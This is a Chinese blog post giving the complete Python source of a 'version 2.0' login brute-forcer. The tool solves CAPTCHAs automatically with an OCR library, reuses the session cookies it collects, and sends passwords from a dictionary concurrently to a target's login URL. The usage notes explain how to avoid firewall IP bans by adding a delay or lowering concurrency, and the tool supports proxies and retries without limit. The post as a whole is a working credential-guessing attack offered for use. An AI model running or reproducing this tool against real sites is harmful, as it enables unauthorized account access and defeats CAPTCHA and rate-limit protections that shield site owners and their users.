验证码识别爆破python版-2.0终极版

验证码识别爆破python版-2.0终极版
验证码识别爆破python版-2.0终极版

说明

  1. 显而易见,进行了颜色显示美化。
  2. 对传参进行了优化,命令不像之前那么脓肿麻烦了,如:
    • 设置多个自定义请求头:-lh "xx:xx" -lh "aa:aa"
    • FORM 数据类型数据包传参:-d "username=bWTdXxa2Sm16K1bZ&code=xsx_yzm&password=xsx_pass&ggcode="
    • JSON 数据类型数据包传参:--data "{"username":"bWTdXxa2Sm16K1bZ","password":"xsx_pass","code":"xsx_yzm"}"
  3. 弃用多线程改为携程,感觉携程更加轻量快速一些。
  4. 对整个代码进行很大的重写和优化,之前版本的可能偶尔蹦出来些小BUG,这个版本应该么得那些问题了。
  5. 关于速度方面,已经尽力优化了,尝试了许多方法,感觉是因为第三方验证码识别库拉低了速度,暂时没想到好的方法….
  6. 如果遇到防火墙拦截频繁请求拉IP的目标,可以将线程改低,还是不行的话,可以将 210 行 前面的#注释符删除掉即可延迟规避防火墙。
  7. 注意:自定义请求头中不能加入Cookie 头,否则会验证码错误,脚本是在请求验证码的同时就已经将获取到的cookie给截取使用了,所以完全没必要在设置cookie。
  8. 第 141 行代码中的验证码三个字为 验证码错误的关键词后面是响应状态码,如果遇到哪怕验证码正确,响应包中也包含验证码这个关键词的话,可以自己找关键词替换进去,又或者直接注释掉这2行代码,否则可能会无限请求爆破。
  9. Python 版本最好是 3.7.0 以上,我自己的版本是3.10.0
  10. 支持无验证码的账号密码爆破,只需要不指定-cu 验证码地址即可,线程数最好别太大,否则容易挂掉或者被拉IP。
  11. 脚本加入了状态码非 200、301、302 则自动无限重试的功能。
  12. 任务是异步挂后台运行的,线程多和少最终执行速度取决于各方面因素,所以自己尝试找到最合适的线程数。
  13. 如果状态码显示-1 可能是请求失败或者请求不完整之类的,脚本会无限重试,如果状态码出现403、500、502之类的,那么就需要人工检查问题出在哪里了。
  14. 最后,使用脚本之前请先安装加载的第三方库:aiohttp,asyncio,argparse,ddddocr,imghdr,tqdm

代码-更新时间(2023 7/26 17.30)—— 【时常改动代码,请自行对比时间更新自己的代码】

import aiohttp,json,asyncio,argparse,ddddocr,imghdr,sys,datetime,urllib.parse
from tqdm import tqdm
 
def banner():
	print('''
				  _       _                         
				 | |     | |                        
   ___ __ _ _ __ | |_ ___| |__   __ _    __ _  ___  
  / __/ _` | '_ | __/ __| '_  / _` |  / _` |/ _  
 | (_| (_| | |_) | || (__| | | | (_| | | (_| | (_) |
  _____,_| .__/ _____|_| |_|__,_|  __, |___/ 
		   | |                           __/ |      
		   |_|                          |___/       
 
Author:xsx  feedback:https://xsx.tw/tools/739/        
Update Time:2023 7/26 17.30
											   
Tips :
1.验证码错误、无法访问、请求超时等失败的请求会自动重试!                                               
2.可以通过 -x 排除不需要回显的状态码、响应结果关键词来让结果更加清晰,多个排除使用空格分割!
3.验证码和登录均支持自定义请求头,可以使用多个参数形式来添加多个请求头: -lh "xx:xx" -lh "aa:aa"!
4.如数据类型是JSON数据,使用反斜杠转义双引号:--data "{\"username\":\"admin\",\"password\":\"xsx_pass\",\"code\":\"xsx_yzm\"}"
''')
 
#日志保存
def save(data):
	f = open('log.txt', 'a',encoding='utf-8')
	f.write(data + 'n')
	f.close()
 
 
#命令行参数
def parse_arguments(argv):
	parser = argparse.ArgumentParser()
 
	# 添加命令行参数
	parser.add_argument('-lu', '--login_url', default='', required=True, help="登录提交地址", type=str)
	parser.add_argument('-cu', '--captcha_url', default='', help="验证码地址", type=str)
	parser.add_argument('-ch', '--captcha_header', action='append', default=['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537'], help="验证码请求头")
	parser.add_argument('-lh', '--login_header', action='append', default=['User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537'], help="登录请求头,必须带上数据类型(application/json 或 application/x-www-form-urlencoded)。")
	parser.add_argument('-d', '--data', default='', required=True, help="1.登录提交的数据包,xsx_pass 替换密码值,xsx_yzm 替换验证码值。 2.如果是JSON数据类型,请给双引号加上反斜杠转义符。", type=str)
	parser.add_argument('-f', '--file', default='', required=True, help="密码字典路径", type=str)
	parser.add_argument('-x', '--xxx', nargs='+', default=[], help="排除的响应包大小回显,多个空格分割")
	parser.add_argument('-t', '--thread', type=int, default=10, help="指定线程数")
	parser.add_argument('-p', '--proxy', type=str, default='', help="代理格式:  协议:IP:端口   如:socks5://127.0.0.1:1080")
 
	# 解析命令行参数
	args = parser.parse_args(argv)
 
	# 处理 captcha_header
	captcha_headers = {}
	if args.captcha_header:
		for header in args.captcha_header:
			key, value = header.split(':')
			captcha_headers[key.strip()] = value.strip()
 
	# 处理 login_header
	login_headers = {}
	if args.login_header:
		for header in args.login_header:
			key, value = header.split(':')
			login_headers[key.strip()] = value.strip()
 
	# 返回解析结果
	return args.login_url, args.captcha_url, captcha_headers, login_headers, args.data, args.file, args.xxx, args.thread, args.proxy
 
 
#字典
def open_data(txt):
	data_list = []
	try:
		with open(txt, 'r', encoding='utf-8') as f:
			for line in f:
				try:
					# 处理每一行的内容
					data_list.append(line.replace("n", ""))
				except Exception:
					tqdm.write(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[91m[ERROR] 读取文件异常,进行重试...33[0m")
					data_list = open_data(txt)  # 递归调用 open_data() 函数进行重试
					break
		return data_list
	except FileNotFoundError:
		exit(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[91m[ERROR] 加载字典失败,请检查路径是否有误!33[0m")
 
async def _ocr(img):
	try:
		if imghdr.what(None, img) is not None:
			ocr = ddddocr.DdddOcr(show_ad=False)
			res = await asyncio.to_thread(ocr.classification, img)
			return res
	except Exception as e:
		exit(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[91m[ERROR] 验证码识别发生错误:33[0m {e}")
 
async def captcha(params):
	headers = params['param3']
	proxies = params['param5']
	url = params['param2']
 
	try:
		async with aiohttp.ClientSession() as session:
			async with session.get(url, headers=headers, proxy=proxies, timeout=3, ssl=False) as response:
				captcha_text = await response.read()
				cookies = response.headers.getall('Set-Cookie')
 
				if cookies and captcha_text:
					return cookies, captcha_text
				else:
					return -1
	except ConnectionResetError as e:
		tqdm.write(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[91m[ERROR] 发生了错误:{e},延迟 3 秒后重试... 33[0m")
		await asyncio.sleep(3)
		return -1
	except Exception as e:
		return -1
 
async def login(data, cookie, params):
	url = params['param1']
	proxies = params['param5']
	headers = {"Cookie": "; ".join(cookie)}
 
	if params['param4']:
		headers.update(params['param4'])
 
	try:
		async with aiohttp.ClientSession() as session:
			async with session.post(params['param1'], data=data, headers=headers, proxy=params['param5'], timeout=3, ssl=False) as response:
				login_text = await response.text()
				if login_text and response.status:
					return response.status, login_text
				else:
					return -1
	except ConnectionResetError as e:
		tqdm.write(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[91m[ERROR] 发生了错误:{e},延迟 3 秒后重试... 33[0m")
		await asyncio.sleep(3)
		return -1
	except Exception as e:
		return -1
 
def login_results(pwd,result):
	status_code, response_text = result
 
	if "验证码" in str(response_text) or str(status_code) not in ['200', '301', '302']:
		return -1
 
	res = [ele for ele in params['param7'] if (ele in str(response_text) or ele in str(status_code))]
 
	if not res:
		if len(str(response_text)) <= 150:
			tqdm.write(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[92m[INFO]  33[96m状态码:33[0m{str(status_code)}  33[96m密码:33[0m{pwd}  33[96m结果:33[0m{str(response_text)}")
 
		else:
			tqdm.write(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[92m[INFO]  33[96m状态码:33[0m{str(status_code)}  33[96m密码:33[0m{pwd}  33[96m结果:33[0m 响应结果太大请查看log.txt文件!")
			save("密码:%s  结果:%sr" % (pwd, str(response_text)))
	
	return str(status_code)
 
async def run(pwd, params):
	if params['param2']:
		#验证码请求
		captcha_task = asyncio.create_task(captcha(params))
		captcha_result = await captcha_task
 
		if captcha_result == -1:
			return -1
 
		#验证码识别
		img_task = asyncio.create_task(_ocr(captcha_result[1]))
		img_result = await img_task
 
		#登录请求
		data = params['param6'].replace('xsx_pass', urllib.parse.quote(pwd)).replace('xsx_yzm', img_result)
		login_task = asyncio.create_task(login(data, captcha_result[0], params))
	else:
		#登录请求
		data = params['param6'].replace('xsx_pass', urllib.parse.quote(pwd))
		login_task = asyncio.create_task(login(data, '', params))
 
	login_result = await login_task
	if login_result == -1:
		return -1
 
	return login_results(pwd,login_result)
 
 
async def execute_tasks(thread, task_list, params):
	pbar = tqdm(total=len(task_list), desc='33[94m任务', mininterval=0.3,
				bar_format=' {l_bar}{bar}| [33[0m33[91m{n_fmt}33[94m/33[0m33[91m{total_fmt}33[0m33[94m] , [33[0m33[91m{rate_fmt}33[0m33[94m] , [用时:33[0m33[91m{elapsed}33[0m33[94m] , [预估完成时间:33[0m33[91m{remaining}33[0m33[94m]{postfix}')
 
	async def process_task(pwd):
		while True:
			try:
				result = await run(pwd, params)
				pbar.set_postfix_str('[状态码:33[0m33[91m' + str(result) + '33[0m33[94m]33[0m')
				if result != -1:
					break
			except Exception as e:
				break
		pbar.update(1)
 
	async def run_tasks():
		tasks = {process_task(pwd) for pwd in task_list[:thread]}
		while tasks:
			completed, tasks = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
			for task in completed:
				await task
 
				if len(task_list) > thread:
					new_task = task_list.pop(thread)
					tasks.add(asyncio.create_task(process_task(new_task)))
 
			#await asyncio.sleep(0.5)  # 添加延迟时间,如果需要则取消注释即可。
 
	try:
		await run_tasks()
	finally:
		pbar.close()
 
 
if __name__ == "__main__":
	banner()
	cmd = parse_arguments(sys.argv[1:])
 
	# 传递参数构造
	params = {
		'param1': cmd[0],
		'param2': cmd[1],
		'param3': cmd[2],
		'param4': cmd[3],
		'param5': cmd[8],
		'param6': cmd[4],
		'param7': cmd[6]
	}
	passlist = open_data(cmd[5])
 
	# 启动
	loop = asyncio.get_event_loop()
	loop.run_until_complete(execute_tasks(cmd[7], passlist, params))
 
	print(f"33[94m[{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}] 33[91m[OK] 全部任务已完成!33[0m")
© 版权声明
THE END
喜欢就支持一下吧
点赞10 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容